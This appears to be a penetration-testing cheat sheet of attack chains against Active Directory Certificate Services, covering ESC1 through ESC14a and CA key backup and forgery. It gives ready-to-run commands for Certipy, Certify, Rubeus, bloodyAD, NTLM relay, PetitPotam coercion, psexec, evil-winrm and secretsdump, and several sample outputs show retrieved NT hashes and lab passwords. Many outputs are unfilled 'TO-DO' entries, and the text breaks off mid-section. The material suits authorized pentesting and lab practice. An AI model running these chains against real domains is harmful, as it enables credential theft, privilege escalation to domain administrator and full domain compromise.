Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Enum (From Linux)
# Password
certipy-ad find -u '<USER>' -p '<PASSWORD>' -target <TARGET> -text -stdout -vulnerable
Sample Output:
TO-DO# NTLM
certipy-ad find -u '<USER>' -hashes '<HASH>' -target <TARGET> -text -stdout -vulnerable
Sample Output:
TO-DO# Kerberos
certipy-ad find -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -k -target <TARGET> -text -stdout -vulnerable -dc-host <DC> -ns <DC_IP>
Sample Output:
TO-DO# Password
nxc ldap <TARGET> -u '<USER>' -p '<PASSWORD>' -M adcs
Sample Output:
TO-DO# NTLM
nxc ldap <TARGET> -u '<USER>' -H '<HASH>' -M adcs
Sample Output:
TO-DOEnum (From Windows)
# Check ADCS service
net start | findstr /i cert
Sample Output:
TO-DO# Check env
certutil
Sample Output:
TO-DO# List cert templates
certutil -catemplates
Sample Output:
TO-DO# Get info of each template
.\Certify.exe enum-cas
Sample Output:
TO-DO# Find vuln templates
.\Certify.exe enum-cas --filter-vulnerable --current-user
Sample Output:
TO-DO# Import ADCSTemplate module
import-module .\ADCSTemplate.psm1
Sample Output:
TO-DO# List templates
get-adcstemplate | fl displayname
Sample Output:
TO-DORef: ADCSTemplate
Request a Personal Information Exchange File (.pfx)
1. Request a pfx
certipy-ad req -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -ca <CA> -template User -target <DC> -pfx '<USER>.pfx'
Sample Output:
$ certipy-ad req -u 'oorend@rebound.htb' -p '1GR8t@$$4u' -ca rebound-DC01-CA -template User -target dc01.rebound.htb -pfx oorend.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 7
[*] Got certificate with UPN 'oorend@rebound.htb'
[*] Certificate object SID is 'S-1-5-21-4078382237-1492182817-2568127209-7682'
[*] Saved certificate and private key to 'oorend.pfx'
2. Get NTLM Hash with pfx
sudo ntpdate -s <DC_IP> && certipy-ad auth -pfx '<USER>.pfx' -domain <DOMAIN> -dc-ip <DC_IP>
Sample Output:
TO-DO1. Request a Certificate
.\Certify.exe request /ca:<CA> /template:User
Sample Output:
TO-DO2. Convert pem to pfx
# Copy -----BEGIN RSA PRIVATE KEY----- ---[SNIP]--- -----END CERTIFICATE----- to cert.pem
openssl pkcs12 -in cert.pem -keyex -CSP 'Microsoft Enhanced Cryptographic Provider v1.0' -export -out cert.pfx
Sample Output:
TO-DO3. Get NTLM Hash with pfx
.\rubeus.exe asktgt /user:'<USER>' /certificate:cert.pfx /getcredentials /show /nowrap
Sample Output:
TO-DOAdministrator of CA
1. Backup CA Certificate and Private Key
# Password
certipy-ad ca -u '<USER>' -p '<PASSWORD>' -target <TARGET_DOMAIN> -backup
Sample Output:
certipy-ad ca -u 'cert_admin' -p 'P@ssw0rd123' -target MS01.example.com -backup
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: MS01.example.com.
[!] Use -debug to print a stacktrace
[*] Creating new service for backup operation
[*] Creating backup
[*] Retrieving backup
[*] Got certificate and private key
[*] Backing up original PFX/P12 to 'pfx.p12'
[*] Backed up original PFX/P12 to 'pfx.p12'
[*] Saving certificate and private key to 'CA.pfx'
[*] Wrote certificate and private key to 'CA.pfx'
[*] Cleaning up
2. Forge a Certificate
certipy-ad forge -ca-pfx CA.pfx -upn administrator@<DOMAIN> -subject 'CN=Administrator,CN=Users,DC=<EXAMPLE>,DC=<COM>'
Sample Output:
$ certipy-ad forge -ca-pfx CA.pfx -upn administrator@example.com -subject 'CN=Administrator,CN=Users,DC=EXAMPLE,DC=COM'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Saving forged certificate and private key to 'administrator_forged.pfx'
[*] Wrote forged certificate and private key to 'administrator_forged.pfx'
3. Export '.crt' and '.key' from '.pfx'
# Export crt
certipy-ad cert -pfx 'administrator_forged.pfx' -nokey -out 'administrator_forged.crt'
Sample Output:
TO-DO# Export key
certipy-ad cert -pfx 'administrator_forged.pfx' -nocert -out 'administrator_forged.key'
Sample Output:
TO-DO4. Pass-the-Cert
python3 passthecert.py -action modify_user -crt administrator_forged.crt -key administrator_forged.key -target <TARGET_USER> -elevate -domain <DOMAIN> -dc-host <DC>
Sample Output:
$ python3 passthecert.py -action modify_user -crt administrator_forged.crt -key administrator_forged.key -target apple.seed -elevate -domain example.com -dc-host dc01.example.com
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Granted user 'apple.seed' DCSYNC rights!
5. Secrets Dump
impacket-secretsdump '<TARGET_USER>:<PASSWORD>@<DC>'
Sample Output:
TO-DOESC1: Enrollee-Supplied Subject for Client Authentication
Abuse #1: Add Smartcard Logon
1. Import Modules
. .\PowerView.ps1
Sample Output:
TO-DO. .\ADCS.ps1
Sample Output:
TO-DO2. Add Smartcart Logon
Get-SmartCardCertificate -Identity Administrator -TemplateName <VULN_TEMPLATE> -NoSmartCard -Verbose
Sample Output:
TO-DO3. Get Cert_Thumbprint
Get-ChildItem cert:\currentuser\my -recurse
Sample Output:
TO-DO4. Get NTLM hash
.\rubeus.exe asktgt /user:Administrator /certificate:<THUMBPRINT> /getcredentials /show /nowrap
Sample Output:
TO-DO5. Remote
impacket-psexec -hashes :<HASH> administrator@<DOMAIN> cmd.exe
Sample Output:
TO-DORef: PoshADCS
Abuse #2: Set Alternative Name
1. Lookup SID
# Password
certipy-ad account -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -target '<DC>' -dc-ip '<DC_IP>' -user '<TARGET_USER>' read
Sample Output:
TO-DO# NTLM
certipy-ad account -u '<USER>@<DOMAIN>' -hashes '<HASH>' -target '<DC>' -dc-ip '<DC_IP>' -user '<TARGET_USER>' read
Sample Output:
$ certipy-ad account -u 'cert_admin@example.com' -hashes 'f87---[SNIP]---773' -target 'dc01.example.com' -dc-ip '10.10.10.10' -user 'administrator' read
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'Administrator':
cn : Administrator
distinguishedName : CN=Administrator,CN=Users,DC=example,DC=com
name : Administrator
objectSid : S-1-5-21-1---[SNIP]---7-500
sAMAccountName : Administrator
userAccountControl : 66048
whenCreated : 2024-11-16T00:01:41+00:00
whenChanged : 2025-07-14T11:03:29+00:00
2. Request Certificate for the Target User
# Password
certipy-ad req -u '<USER>' -p '<PASSWORD>' -target <TARGET> -upn <TARGET_USER>@<DOMAIN> -ca <CA> -template <VULN_TEMPLATE> -key-size 4096 -sid <SID>
Sample Output:
TO-DO# NTLM
certipy-ad req -u '<USER>' -hashes '<HASH>' -target <TARGET> -upn <TARGET_USER>@<DOMAIN> -ca <CA> -template <VULN_TEMPLATE> -key-size 4096 -sid <SID>
Sample Output:
TO-DO# Kerberos
certipy-ad req -u '<USER>' -p '<PASSWORD>' -k -target <TARGET> -upn <TARGET_USER>@<DOMAIN> -ca <CA> -template <VULN_TEMPLATE> -key-size 4096 -sid <SID>
Sample Output:
TO-DO3. Get NTLM Hash
sudo ntpdate -s <DC_IP> && certipy-ad auth -pfx <TARGET_USER>.pfx -domain <DOMAIN> -dc-ip <DC_IP>
Sample Output:
TO-DO4. Remote
evil-winrm -i <TARGET> -u <TARGET_USER> -H <HASH>
Sample Output:
TO-DO1. Generate a Cert with Altname
.\Certify.exe request /ca:<CA> /template:<VULN_TEMPLATE> /altname:administrator
Sample Output:
TO-DO2. Convert pem to pfx
# Copy -----BEGIN RSA PRIVATE KEY----- ---[SNIP]--- -----END CERTIFICATE----- to cert.pem
openssl pkcs12 -in cert.pem -keyex -CSP 'Microsoft Enhanced Cryptographic Provider v1.0' -export -out administrator.pfx
Sample Output:
TO-DO3. Get NTLM Hash
.\rubeus.exe asktgt /user:Administrator /certificate:administrator.pfx /getcredentials /show /nowrap
Sample Output:
TO-DO4. Remote
# Remote
impacket-psexec -hashes :<HASH> administrator@<DOMAIN> cmd.exe
Sample Output:
TO-DOAbuse #3: Set msPKI-Certificate-Name-Flag
1. Import ADCSTemplate Module
import-module .\ADCSTemplate.psm1
Sample Output:
TO-DO2. Create Template with msPKI-Certificate-Name-Flag Modified
Export-ADCSTemplate -displayName <VULN_TEMPLATE> > template.json
Sample Output:
TO-DO$template = cat template.json -raw | ConvertFrom-Json
Sample Output:
TO-DO$template.'msPKI-Certificate-Name-Flag' = 0x1
Sample Output:
TO-DO$template | ConvertTo-Json | Set-Content template_mod.json
Sample Output:
TO-DO3. Create a New Certificate Template
New-ADCSTemplate -DisplayName 'vuln_esc1' -Publish -JSON (cat template_mod.json -raw)
Sample Output:
TO-DO4. Allow the User to Enroll in the Certificate
# Set permissions on the new template to allow a specific user to enroll in the certificate
Set-ADCSTemplateACL -DisplayName 'vuln_esc1' -type allow -identity '<DOMAIN>\<USER>' -enroll
Sample Output:
TO-DO5. Request a Cert with Altname
.\Certify.exe request /ca:<CA> /template:vuln_esc1 /altname:administrator
Sample Output:
TO-DO6. Get NTLM Hash
.\rubeus.exe asktgt /user:Administrator /certificate:administrator.pfx /getcredentials /show /nowrap
Sample Output:
TO-DO7. Remote
impacket-psexec -hashes :<HASH> administrator@<DOMAIN> cmd.exe
Sample Output:
TO-DORef: ADCSTemplate
ESC4: Template Hijacking
1. Modify Template to a Vulnerable State
# Password
certipy-ad template -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -template '<TEMPLATE>' -write-default-configuration -no-save
Sample Output:
TO-DO# NTLM
certipy-ad template -u '<USER>@<DOMAIN>' -hashes '<HASH>' -template '<TEMPLATE>' -write-default-configuration -no-save
Sample Output:
$ certipy-ad template -u 'ca_svc@sequel.htb' -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -template 'DunderMifflinAuthentication' -write-default-configuration -no-save
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: SEQUEL.HTB.
[!] Use -debug to print a stacktrace
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Replacing:
[*] nTSecurityDescriptor: b'\x01\x00\x04\x9c0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x00\x1c\x00\x01\x00\x00\x00\x00\x00\x14\x00\xff\x01\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00'
[*] flags: 66104
[*] pKIDefaultKeySpec: 2
[*] pKIKeyUsage: b'\x86\x00'
[*] pKIMaxIssuingDepth: -1
[*] pKICriticalExtensions: ['2.5.29.19', '2.5.29.15']
[*] pKIExpirationPeriod: b'\x00@9\x87.\xe1\xfe\xff'
[*] pKIExtendedKeyUsage: ['1.3.6.1.5.5.7.3.2']
[*] pKIDefaultCSPs: ['2,Microsoft Base Cryptographic Provider v1.0', '1,Microsoft Enhanced Cryptographic Provider v1.0']
[*] msPKI-Enrollment-Flag: 0
[*] msPKI-Private-Key-Flag: 16
[*] msPKI-Certificate-Name-Flag: 1
[*] msPKI-Certificate-Application-Policy: ['1.3.6.1.5.5.7.3.2']
Are you sure you want to apply these changes to 'DunderMifflinAuthentication'? (y/N): y
[*] Successfully updated 'DunderMifflinAuthentication'
2. Request a Certificate Using the Modified Template
# Password
certipy-ad req -username '<USER>' -p '<PASSWORD>' -template '<TEMPLATE>' -target <TARGET> -ca <CA> -upn administrator@<DOMAIN>
Sample Output:
TO-DO# NTLM
certipy-ad req -username '<USER>' -hashes '<HASH>' -template '<TEMPLATE>' -target <TARGET> -ca <CA> -upn administrator@<DOMAIN>
Sample Output:
$ certipy-ad req -username 'ca_svc' -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -template 'DunderMifflinAuthentication' -target DC01.sequel.htb -ca sequel-DC01-CA -upn administrator@sequel.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: DC01.sequel.htb.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 6
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
3. Get NTLM Hash
certipy-ad auth -pfx administrator.pfx -domain <DOMAIN> -dc-ip <DC_IP>
Sample Output:
$ certipy-ad auth -pfx administrator.pfx -domain sequel.htb -dc-ip 10.129.255.195
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@sequel.htb'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff
4. Remote
evil-winrm -i <TARGET> -u administrator -H <HASH>
Sample Output:
TO-DO1. Import Module
. .\PowerView.ps1
Sample Output:
TO-DO2. Modify Template to a Vulnerable State
Add-DomainObjectAcl -TargetIdentity <VULN_TEMPLATE> -PrincipalIdentity "Domain Users" -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=<EXAMPLE>,DC=<COM>"
Sample Output:
TO-DOSet-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=<EXAMPLE>,DC=<COM>" -Identity <VULN_TEMPLATE> -XOR @{'mspki-certificate-name-flag'=1} -Verbose
Sample Output:
TO-DOSet-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=<EXAMPLE>,DC=<COM>" -Identity <VULN_TEMPLATE> -Set @{'mspki-certificate-application-policy'='1.3.6.1.5.5.7.3.2'} -Verbose
Sample Output:
TO-DO3. Request a Certificate Using the Modified Template
.\Certify.exe request --ca <DOMAIN>>\<CA> --template <VULN_TEMPLATE> --upn administrator@<DOMAIN>
Sample Output:
TO-DO4. Get NTLM Hash
# Convert the base64 encoded cert
echo '<BASE64_CERT>' | base64 -d > administrator.pfx
Sample Output:
TO-DO# Request a TGT
.\rubeus.exe asktgt /user:Administrator /certificate:<PFX_FILE> /ptt /nowrap /getcredentials
Sample Output:
TO-DOESC7: Dangerous Permissions on CA
1. Use ManageCA Privilege to Add Manage Certificates Permission
certipy-ad ca -ca <CA> -add-officer '<USER>' -u '<USER>@<DOMAIN>' -p '<PASSWORD>'
Sample Output:
TO-DO# Check
certipy-ad find -dc-ip <DC> -ns <DC_IP> -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -vulnerable -stdout
Sample Output:
TO-DO2. Enable SubCA Template [Optional]
certipy-ad ca -ca <CA> -enable-template 'SubCA' -u '<USER>@<DOMAIN>' -p '<PASSWORD>'
Sample Output:
TO-DO3. Request a Cert Based on SubCA
# Expect to be failed. Take note of the Request ID
certipy-ad req -ca <CA> -target <TARGET_DOMAIN> -template SubCA -upn administrator@<DOMAIN> -u '<USER>@<DOMAIN>' -p '<PASSWORD>'
Sample Output:
TO-DO4. Issue Request Using ManageCA and Manage Certificates Privilege
certipy-ad ca -ca <CA> -issue-request <REQUEST_ID> -u '<USER>@<DOMAIN>' -p '<PASSWORD>'
Sample Output:
TO-DO5. Request a Certificate from CA on the Target Domain
certipy-ad req -ca <CA> -target <TARGET_DOMAIN> -retrieve <REQUEST_ID> -u '<USER>@<DOMAIN>' -p '<PASSWORD>'
Sample Output:
TO-DO6. Get NTLM Hash
certipy-ad auth -pfx administrator.pfx -domain <DOMAIN> -dc-ip <DC_IP>
Sample Output:
TO-DO7. Remote
evil-winrm -i <TARGET> -u administrator -H <HASH>
Sample Output:
TO-DOESC8: NTLM Relay to AD CS Web Enrollment
1. DNS Poisoning
# Password
bloodyAD -u '<USER>' -p '<PASSWORD>' -d <DOMAIN> -k --host <DC> add dnsRecord '<DC_HOSTNAME>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' <LOCAL_IP>
Sample Output:
TO-DO# NTLM
bloodyAD -u '<USER>' -p ':<HASH>' -f rc4 -d <DOMAIN> --host <DC> add dnsRecord '<DC_HOSTNAME>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' <LOCAL_IP>
Sample Output:
$ bloodyAD -u 'apple.seed' -p ':be167---[REDACTED]---68017' -f rc4 -d example.com --host DC01.example.com add dnsRecord 'DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.10.149.102
2. Setup NTLM Relay
certipy-ad relay -target '<TARGET_URL>' -template DomainController
Sample Output:
$ certipy-ad relay -target 'http://DC02.example.com/certsrv/certfnsh.asp' -template DomainController
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting http://DC02.example.com/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
[*] Setting up SMB Server on port 445
[*] SMBD-Thread-2 (process_request_thread): Received connection from 127.0.0.1, attacking target http://DC02.example.com
[*] HTTP Request: GET http://dc02.example.com/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://dc02.example.com/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://dc02.example.com/certsrv/certfnsh.asp "HTTP/1.1 200 OK"
[*] Authenticating against http://DC02.example.com as EXAMPLE/DC01$ SUCCEED
[*] Requesting certificate for 'EXAMPLE\\DC01$' based on the template 'DomainController'
[*] HTTP Request: POST http://dc02.example.com/certsrv/certfnsh.asp "HTTP/1.1 200 OK"
[*] Certificate issued with request ID 5
[*] Retrieving certificate for request ID: 5
[*] HTTP Request: GET http://dc02.example.com/certsrv/certnew.cer?ReqID=5 "HTTP/1.1 200 OK"
[*] Got certificate with DNS Host Name 'DC01.example.com'
[*] Certificate object SID is 'S-1-5-21-1202327606-3023051327-2528451343-1000'
[*] Saving certificate and private key to 'dc01.pfx'
[*] Wrote certificate and private key to 'dc01.pfx'
[*] Exiting...
3. Check Coerce Authentication Methods
nxc smb <DC> -u '<USER>' -p '<PASSWORD>' -d <DOMAIN> -k -M coerce_plus
Sample Output:
$ nxc smb DC01.example.com -u 'apple.seed' -H 'be167---[REDACTED]---68017' -d example.com -k -M coerce_plus
SMB DC01.example.com 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:example.com) (signing:True) (SMBv1:False)
SMB DC01.example.com 445 DC01 [+] example.com\apple.seed:be167---[REDACTED]---68017
COERCE_PLUS DC01.example.com 445 DC01 VULNERABLE, DFSCoerce
COERCE_PLUS DC01.example.com 445 DC01 VULNERABLE, PetitPotam
COERCE_PLUS DC01.example.com 445 DC01 VULNERABLE, PrinterBug
COERCE_PLUS DC01.example.com 445 DC01 VULNERABLE, PrinterBug
COERCE_PLUS DC01.example.com 445 DC01 VULNERABLE, MSEven
4. Coerce Authentication
nxc smb <DC> -u '<USER>' -p '<PASSWORD>' -d <DOMAIN> -k -M coerce_plus -o LISTENER=<DC_HOSTNAME>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA METHOD=<METHOD>
Sample Output:
$ nxc smb DC01.example.com -u 'apple.seed' -H 'be167---[REDACTED]---68017' -d example.com -M coerce_plus -o LISTENER=DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA METHOD=PetitPotam
SMB 10.10.149.101 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:example.com) (signing:True) (SMBv1:False)
SMB 10.10.149.101 445 DC01 [+] example.com\apple.seed:be167---[REDACTED]---68017
COERCE_PLUS 10.10.149.101 445 DC01 VULNERABLE, PetitPotam
COERCE_PLUS 10.10.149.101 445 DC01 Exploit Success, lsarpc\EfsRpcAddUsersToFile
5. Get NTLM Hash
certipy-ad auth -pfx <DC_HOSTNAME>.pfx -domain <DOMAIN> -dc-ip <DC_IP>
Sample Output:
$ certipy-ad auth -pfx dc01.pfx -domain example.com -dc-ip 10.10.149.101
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN DNS Host Name: 'DC01.example.com'
[*] Security Extension SID: 'S-1-5-21-1202327606-3023051327-2528451343-1000'
[*] Using principal: 'dc01$@example.com'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'dc01.ccache'
[*] Wrote credential cache to 'dc01.ccache'
[*] Trying to retrieve NT hash for 'dc01$'
[*] Got hash for 'dc01$@example.com': aad3b435b51404eeaad3b435b51404ee:156dd---[REDACTED]---b077c
1. Setup
+-------------------------------------------------+
| 1. Join Domain |
| 2. Config DNS |
| 3. Config C:\Windows\System32\drivers\etc\hosts |
+-------------------------------------------------+
Sample Output:
TO-DO2. Request a Ticket
.\rubeus.exe asktgt /user:'<USER>' /password:'<PASSWORD>' /enctype:AES256 /domain:'<DOMAIN>' /dc:'<DC>' /ptt /nowrap
Sample Output:
TO-DO3. Check
klist
Sample Output:
TO-DO4. RemoteKrbRelay
.\RemoteKrbRelay.exe -adcs -template DomainController -victim <VICTIM> -target <TARGET> -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3
Sample Output:
TO-DO5. Convert Base64 Encoded Cert to p12
cat cert_b64 | base64 -d > cert.p12
Sample Output:
TO-DO6. Get NTLM Hash
certipy-ad auth -pfx cert.p12 -domain <DOMAIN> -dc-ip <DC_IP>
Sample Output:
TO-DORef: RemoteKrbRelay
ESC9: No Security Extension on Certificate Template
1. Modify Target User’s userPrincipalName (With GenericAll/GenericWrite)
# Password
certipy-ad account update -username '<USER>@<DOMAIN>' -password '<PASSWORD>' -user <TARGET_USER> -upn Administrator
Sample Output:
TO-DO# NTLM
certipy-ad account update -username '<USER>@<DOMAIN>' -hashes <HASH> -user <TARGET_USER> -upn Administrator
Sample Output:
$ certipy-ad account update -username 'management_svc@CERTIFIED.HTB' -hashes a091c1832bcdd4677c28b5a6a1295584 -user CA_OPERATOR -upn Administrator
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: CERTIFIED.HTB.
[!] Use -debug to print a stacktrace
[*] Updating user 'ca_operator':
userPrincipalName : Administrator
[*] Successfully updated 'ca_operator'
2. Request a Cert of Target User
# Password
certipy-ad req -username '<TARGET_USER>@<DOMAIN>' -password '<PASSWORD>' -ca <CA> -template <VULN_TEMPLATE>
Sample Output:
TO-DO# NTLM
certipy-ad req -username '<TARGET_USER>@<DOMAIN>' -hashes <HASH> -ca <CA> -template <VULN_TEMPLATE>
Sample Output:
$ certipy-ad req -username 'CA_OPERATOR@CERTIFIED.HTB' -hashes b4b86f45c6018f1b664f70805f45d8f2 -ca certified-DC01-CA -template CertifiedAuthentication
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: CERTIFIED.HTB.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 6
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
3. Change Back Target User’s userPrincipalName
# Password
certipy-ad account update -username '<USER>@<DOMAIN>' -password '<PASSWORD>' -user <TARGET_USER> -upn '<TARGET_USER>@<DOMAIN>'
Sample Output:
TO-DO# NTLM
certipy-ad account update -username '<USER>@<DOMAIN>' -hashes <HASH> -user <TARGET_USER> -upn '<TARGET_USER>@<DOMAIN>'
Sample Output:
$ certipy-ad account update -username 'management_svc@CERTIFIED.HTB' -hashes a091c1832bcdd4677c28b5a6a1295584 -user CA_OPERATOR -upn 'CA_OPERATOR@CERTIFIED.HTB'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: CERTIFIED.HTB.
[!] Use -debug to print a stacktrace
[*] Updating user 'ca_operator':
userPrincipalName : CA_OPERATOR@CERTIFIED.HTB
[*] Successfully updated 'ca_operator'
4. Get NTLM Hash
certipy-ad auth -pfx administrator.pfx -domain <DOMAIN> -dc-ip <DC_IP>
Sample Output:
$ certipy-ad auth -pfx administrator.pfx -domain certified.htb -dc-ip 10.129.231.186
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator'
[*] Using principal: 'administrator@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
5. Remote
evil-winrm -i <TARGET> -u administrator -H <HASH>
Sample Output:
TO-DOESC10: Weak Certificate Mapping for Schannel Authentication
1. Request a TGT
# Password
sudo ntpdate -s <DC_IP> && impacket-getTGT '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP>
Sample Output:
TO-DO# NTLM
sudo ntpdate -s <DC_IP> && impacket-getTGT '<DOMAIN>/<USER>' -hashes ':<HASH>' -dc-ip <DC_IP>
Sample Output:
TO-DOexport KRB5CCNAME='<USER>.ccache'
Sample Output:
TO-DO2. Check
# Look for WRITE on altSecurityIdentities
bloodyAD -d <DOMAIN> -k --host <DC> get writable --detail
Sample Output:
altSecurityIdentities: WRITE
# Look for CertificateMappingMethods = 0x4
reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\'
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\'
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL
EventLogging REG_DWORD 0x1
CertificateMappingMethods REG_DWORD 0x4
# Look for Target User UPN
certipy-ad account -k -target '<DC>' -dc-ip '<DC_IP>' -user '<TARGET_USER>' read
Sample Output:
TO-DO2. Modify Target User’s userPrincipalName
# Kerberos
certipy-ad account -k -target '<DC>' -dc-ip '<DC_IP>' -user '<TARGET_USER>' -upn '<DC_HOSTNAME>$@<DOMAIN>' update
Sample Output:
TO-DO2. Request a Cert of Target User
# Password
sudo ntpdate -s <DC_IP> && impacket-getTGT '<DOMAIN>/<TARGET_USER>:<PASSWORD>' -dc-ip <DC_IP>
Sample Output:
TO-DO# NTLM
sudo ntpdate -s <DC_IP> && impacket-getTGT '<DOMAIN>/<TARGET_USER>' -hashes ':<HASH>' -dc-ip <DC_IP>
Sample Output:
TO-DOexport KRB5CCNAME='<TARGET_USER>.ccache'
Sample Output:
TO-DOcertipy-ad req -k -target '<DC>' -dc-ip '<DC_IP>' -ca '<CA>' -template 'User'
Sample Output:
TO-DO3. Change Back Target User’s userPrincipalName
export KRB5CCNAME='<USER>.ccache'
Sample Output:
TO-DOcertipy-ad account -k -target '<DC>' -dc-ip '<DC_IP>' -user '<TARGET_USER>' -upn '<UPN>' update
Sample Output:
TO-DO4. Get LDAP Shell
certipy-ad auth -pfx '<DC_HOSTNAME>.pfx' -dc-ip '<DC_IP>' -ldap-shell
Sample Output:
TO-DO5. Set RBCD
set_rbcd <DC_HOSTNAME>$ <USER>
Sample Output:
TO-DO6. Get a Service Ticket
# Password
impacket-getST '<DOMAIN>/<USER>:<PASSWORD>' -spn 'ldap/<DC>' -impersonate <DC_HOSTNAME>
Sample Output:
TO-DO# NTLM
impacket-getST '<DOMAIN>/<USER>' -hashes ':<HASH>' -spn 'ldap/<DC>' -impersonate <DC_HOSTNAME>
Sample Output:
TO-DOexport KRB5CCNAME='<DC_HOSTNAME>@ldap_<DC>@<DOMAIN>.ccache'
Sample Output:
TO-DO7. Secretsdump
impacket-secretsdump -k -no-pass <DC>
Sample Output:
TO-DOESC13: Issuance Policy with Privileged Group Linked
1. Request a Cert of User
# Password
certipy-ad req -username '<USER>@<DOMAIN>' -password '<PASSWORD>' -ca <CA> -template <VULN_TEMPLATE>
Sample Output:
TO-DO# NTLM
certipy-ad req -username '<USER>@<DOMAIN>' -hashes <HASH> -ca <CA> -template <VULN_TEMPLATE>
Sample Output:
TO-DO2. Get a TGT
certipy-ad auth -pfx '<USER>.pfx' -dc-ip '<DC_IP>'
Sample Output:
TO-DOESC14a: Weak Explicit Certificate Mapping (altSecurityIdentities)
1. Create a Computer
bloodyAD -u '<USER>' -p '<PASSWORD>' -d <DOMAIN> --host <DC> add computer evilcomputer '<NEW_PASSWORD>'
Sample Output:
TO-DO2. Request a Cert of the Computer
certipy-ad req -u 'evilcomputer$' -p '<NEW_PASSWORD>' -target <DC> -dc-ip <DC_IP> -ca <CA> -template Machine
Sample Output:
TO-DO3. Convert .pfx to .crt
certipy-ad cert -pfx evilcomputer.pfx -nokey -out "evilcomputer.crt"
Sample Output:
TO-DO4. Inspect Serial Number and Issuer
openssl x509 -in evilcomputer.crt -noout -text
Sample Output:
TO-DO5. Convert to X509 Issuer SerialNumber Format
python3 conv.py -serial '<SERIAL_NUMBER>' -issuer '<ISSUER>'
Sample Output:
TO-DO6. Update Attribute (From Windows)
$map = '<X509_ISSUER_SERIAL_NUMBER_FORMAT>'
Sample Output:
TO-DOSet-ADUser <TARGET_USER> -Replace @{altSecurityIdentities=$map}
Sample Output:
TO-DO7. Get NTLM Hash
